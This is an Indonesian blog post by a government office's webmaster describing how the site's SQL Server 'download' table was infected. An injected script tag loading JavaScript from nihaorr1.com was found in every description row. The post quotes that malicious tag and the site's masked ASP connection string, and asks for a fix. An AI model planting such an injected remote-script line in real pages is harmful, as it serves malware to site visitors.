Bagaimana Mengatasi Serangan “Nihaorr1”?
Pindahan dari Multiply
URL: http://webkppn.multiply.com/journal/item/5/Bagaimana-Mengatasi-Serangan-Nihaorr1
Belum setengah jam yang lalu saya melihat hal aneh di halaman download website KPPN Khusus Banda Aceh. Anehnya, setiap baris terasa lama dalam menampilkannya karena harus “menanti hubungan” dengan nihaorr1.com. Wah! Apa ini? Karena penasaran, saya mencoba membuka http://www.nihaorr1.com. Ternyata Mallware Warning di komputer saya bilang begini, “Warning – visiting this web site may harm your computer!”
Saya lihat script di “download.asp” tidak ada yang aneh. Oh, ternyata biang keroknya ada di dalam tabel “download” yang ada di database SQL Server. Ada sisipan “<script src=http://www.nihaorr1.com/1.js></script>” di setiap baris pada kolom “deskripsi.” Selama ini SQL Server memang dipakai website untuk menampung database laian-lain, selain SP2D. Yang jadi pertanyaan, kenapa si Nihaorr1 ini bisa menyusup ke database SQL Server? Apa yang salah? Apakah ini ada kaitannya dengan script koneksi ke SQL Server yang mungkin terlalu sederhana? Lihat:
set conumum=Server.CreateObject(“ADODB.Connection”)
conumum.Open “Provider=SQLOLEDB.1;Persist Security Info=True;User ID=xxxx;Initial Catalog=xxxx”
Sejauh ini yang ketahuan baru tabel “download.” Tidak menutup kemungkinan, serangan akan menjalar ke tabel-tabel lain. Waduh, gimana nih ya?
Mungkin di sini ada pemecahannya, tapi saya belum baca:
http://forums.iis.net/p/1148917/1867511.aspx